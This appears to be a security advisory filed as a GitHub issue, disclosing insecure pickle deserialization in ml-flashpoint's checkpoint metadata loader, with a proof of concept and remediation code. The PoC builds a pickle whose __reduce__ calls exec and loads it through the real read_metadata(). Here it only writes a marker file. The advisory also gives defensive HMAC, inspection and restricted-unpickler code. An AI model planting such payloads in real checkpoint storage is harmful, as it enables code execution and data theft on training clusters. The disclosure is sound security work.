[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74
Summary
DefaultMLFlashpointCheckpointLoader.read_metadata() in src/ml_flashpoint/core/checkpoint_loader.py uses pickle.load() to deserialize .metadata files from checkpoint directories. These files can originate from untrusted peer nodes in a distributed training cluster (via ReplicationManager.sync_bulk_retrieve) or from shared storage. An attacker who controls a peer node or can write to shared checkpoint storage can craft a malicious pickle payload that achieves arbitrary code execution on any node that loads the checkpoint metadata.
Description
- Type: Insecure Deserialization (CWE-502)
- Source: .metadata files read from Path(checkpoint_id.data) / object_name (line 152). In distributed deployments, these files arrive via sync_bulk_retrieve from peer nodes over the network, or from shared filesystem storage accessible to multiple nodes.
- Sink: pickle.load(f) at lines 154-155 of checkpoint_loader.py. No validation, allowlisting, or sandboxing is applied to the data before it is deserialized.
- Impact: Arbitrary code execution with the privileges of the ML training process. An attacker can exfiltrate model weights, training data, or credentials, or pivot to other systems in the cluster. In multi-tenant or federated training scenarios, a single compromised or malicious participant can compromise every other node that loads its checkpoint metadata.
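The sink is dangerous because of how pickle itself works, independent of ml-flashpoint: an object's __reduce__ can instruct pickle to rebuild it by calling any importable callable with attacker-chosen arguments, and pickle.load() performs that call. The following is a minimal, harmless sketch using only the standard library. record_call and Payload are hypothetical names, with record_call standing in for exec or os.system.

```python
import pickle

# Harmless stand-in for exec or os.system: it only records that it ran.
CALLS: list[str] = []


def record_call(message: str) -> str:
    CALLS.append(message)
    return message


class Payload:
    def __reduce__(self):
        # Tell pickle to rebuild this object by calling
        # record_call("ran during load") instead of restoring its state.
        return (record_call, ("ran during load",))


blob = pickle.dumps(Payload())
print(CALLS)  # []  (serializing does not call record_call)

restored = pickle.loads(blob)
print(CALLS)  # ['ran during load']
print(type(restored).__name__)  # str
```

The loaded value is not a Payload at all; it is whatever the callable returned. By the time a caller could check the type of the loaded metadata, the callable has already run.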
Attack Vectors
- Malicious peer node: In a distributed training cluster, _try_retrieve_object_if_missing() calls sync_bulk_retrieve() to fetch checkpoint objects from peer nodes. A compromised peer can serve a crafted .metadata pickle payload. When any other node calls read_metadata() (triggered by _compute_retrieval_plan() or get_latest_complete_checkpoint()), the malicious pickle executes arbitrary code.
- Shared storage poisoning: In shared-storage deployments, an attacker with write access to the checkpoint directory can replace or inject a malicious .metadata file. Any node loading that checkpoint will execute the payload.
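Both vectors rely on the loading node accepting .metadata bytes it cannot attribute to a trusted writer. One complementary hardening step is to authenticate the raw bytes with an HMAC before any deserializer sees them. This is a sketch under assumptions: the shared key, its out-of-band distribution, the hypothetical helpers sign_metadata and verify_metadata, and wherever the tag would be stored are all illustrative and not part of ml-flashpoint. An HMAC does not stop a compromised peer that holds the key, so it supplements a safe deserializer rather than replacing one.

```python
import hashlib
import hmac


def sign_metadata(key: bytes, data: bytes) -> bytes:
    """Compute an HMAC-SHA256 tag over raw .metadata bytes (hypothetical helper)."""
    return hmac.new(key, data, hashlib.sha256).digest()


def verify_metadata(key: bytes, data: bytes, tag: bytes) -> bytes:
    """Return data only if its tag matches; raise ValueError otherwise.

    Deserialize the returned bytes, never the unverified input.
    """
    expected = sign_metadata(key, data)
    # compare_digest avoids leaking how many bytes matched through timing.
    if not hmac.compare_digest(expected, tag):
        raise ValueError("metadata failed integrity check; refusing to load")
    return data


if __name__ == "__main__":
    key = b"hypothetical-key-distributed-out-of-band"
    original = b"trusted metadata bytes"
    tag = sign_metadata(key, original)

    print(verify_metadata(key, original, tag))  # b'trusted metadata bytes'
    try:
        verify_metadata(key, b"swapped-in payload", tag)
    except ValueError as exc:
        print("rejected:", exc)
```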
Affected
- Package: ml-flashpoint (pip)
- Repository: google/ml-flashpoint
- File: src/ml_flashpoint/core/checkpoint_loader.py
- Function: DefaultMLFlashpointCheckpointLoader.read_metadata() (lines 147-158)
- Versions: All versions (as of commit on main branch)
PoC
A proof-of-concept demonstrates arbitrary code execution by crafting a malicious .metadata pickle file that writes a marker file when deserialized.
payload.py generates a malicious .metadata file using pickle.dump() with a class that overrides __reduce__ to execute arbitrary code:

import os
import pickle

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
METADATA_FILE = os.path.join(CHECKPOINT_DIR, ".metadata")

class MaliciousPayload:
    def __reduce__(self):
        # On unpickling, pickle calls exec() with this string instead of
        # rebuilding a MaliciousPayload; here it only drops a marker file.
        return (exec, ("open('pwned.txt','w').write('pwned')",))

def generate():
    # Write the payload where the loader expects checkpoint metadata.
    os.makedirs(CHECKPOINT_DIR, exist_ok=True)
    with open(METADATA_FILE, "wb") as f:
        pickle.dump(MaliciousPayload(), f)
    return METADATA_FILE

exploit.py invokes the real DefaultMLFlashpointCheckpointLoader.read_metadata() from the built ml-flashpoint package:
import os
import sys

POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
sys.path.insert(0, POC_DIR)  # make payload.py importable

import payload
from ml_flashpoint.core.checkpoint_id_types import CheckpointContainerId
from ml_flashpoint.core.checkpoint_loader import DefaultMLFlashpointCheckpointLoader

# Start clean so a leftover marker file cannot fake a success.
if os.path.exists("pwned.txt"):
    os.remove("pwned.txt")

payload.generate()

# Load the poisoned metadata through the library's own code path;
# pickle.load() inside read_metadata() runs the embedded exec().
loader = DefaultMLFlashpointCheckpointLoader(None, None)
loader.read_metadata(CheckpointContainerId(CHECKPOINT_DIR), ".metadata")

if os.path.exists("pwned.txt"):
    with open("pwned.txt") as f:
        print("EXPLOIT_SUCCESS:", f.read())
else:
    sys.exit(1)

Running the exploit creates pwned.txt, proving arbitrary code execution via pickle.load() in read_metadata().
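Because a pickle is a stream of opcodes, a suspicious .metadata file such as the one payload.py writes can be inspected without running it. The sketch below uses the standard library's pickletools.genops(), which parses a pickle stream but never executes it, to list the globals the pickle would import; for a payload like the PoC's it reveals builtins.exec. referenced_globals is a hypothetical helper, and because it does not resolve memo lookups it is a triage aid, not a defense.

```python
import pickle
import pickletools


def referenced_globals(data: bytes) -> list[str]:
    """Heuristically list the module.name globals a pickle would import.

    pickletools.genops() only parses opcodes; nothing is executed. STACK_GLOBAL
    (protocol 4+) takes its operands from the stack, so the two most recent
    string pushes are used. Memo lookups (e.g. BINGET) are not resolved.
    """
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # Protocols 0-3 encode the reference as one "module name" argument.
            module, name = arg.split(" ", 1)
            found.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2:
                found.append(f"{recent_strings[-2]}.{recent_strings[-1]}")
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


if __name__ == "__main__":
    class _DemoPayload:
        def __reduce__(self):
            return (exec, ("print('this would run on load')",))

    blob = pickle.dumps(_DemoPayload(), protocol=4)
    print(referenced_globals(blob))  # ['builtins.exec']
    print(referenced_globals(pickle.dumps({"step": 100}, protocol=4)))  # []
```

To check the PoC's file instead, read fake_checkpoint/.metadata in binary mode and pass its bytes to the same function.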
Remediation
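Replace pickle.load() with a deserialization method that cannot execute code, for example a data-only format such as JSON. If pickle must be kept for compatibility, restrict the classes it may load by overriding pickle.Unpickler.find_class() with an explicit allowlist.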
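If pickle cannot be dropped immediately, the "Restricting Globals" pattern from the Python pickle documentation limits what a payload can reach by overriding find_class(). The following is a sketch that assumes the metadata only needs the (module, name) pairs in ALLOWED_GLOBALS. That allowlist is hypothetical and would have to be derived from the classes ml-flashpoint actually writes. A data-only format remains the stronger fix, since any allowlisted class with side effects in its constructor is still reachable.

```python
import collections
import io
import pickle

# Hypothetical allowlist: only these (module, name) globals may be resolved.
ALLOWED_GLOBALS = frozenset({
    ("collections", "OrderedDict"),
})


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Invoked whenever the stream references a global
        # (e.g. GLOBAL or STACK_GLOBAL opcodes).
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_load(f):
    """Replacement for pickle.load(f) that refuses non-allowlisted globals."""
    return RestrictedUnpickler(f).load()


def restricted_loads(data: bytes):
    """Replacement for pickle.loads(data) with the same restriction."""
    return restricted_load(io.BytesIO(data))


if __name__ == "__main__":
    ok = restricted_loads(pickle.dumps(collections.OrderedDict(step=100)))
    print(dict(ok))  # {'step': 100}

    class _Exploit:
        def __reduce__(self):
            return (exec, ("print('should never run')",))

    try:
        restricted_loads(pickle.dumps(_Exploit()))
    except pickle.UnpicklingError as exc:
        print("blocked:", exc)  # blocked: global 'builtins.exec' is forbidden
```

In read_metadata(), the pickle.load(f) call at the sink would become restricted_load(f) under this approach.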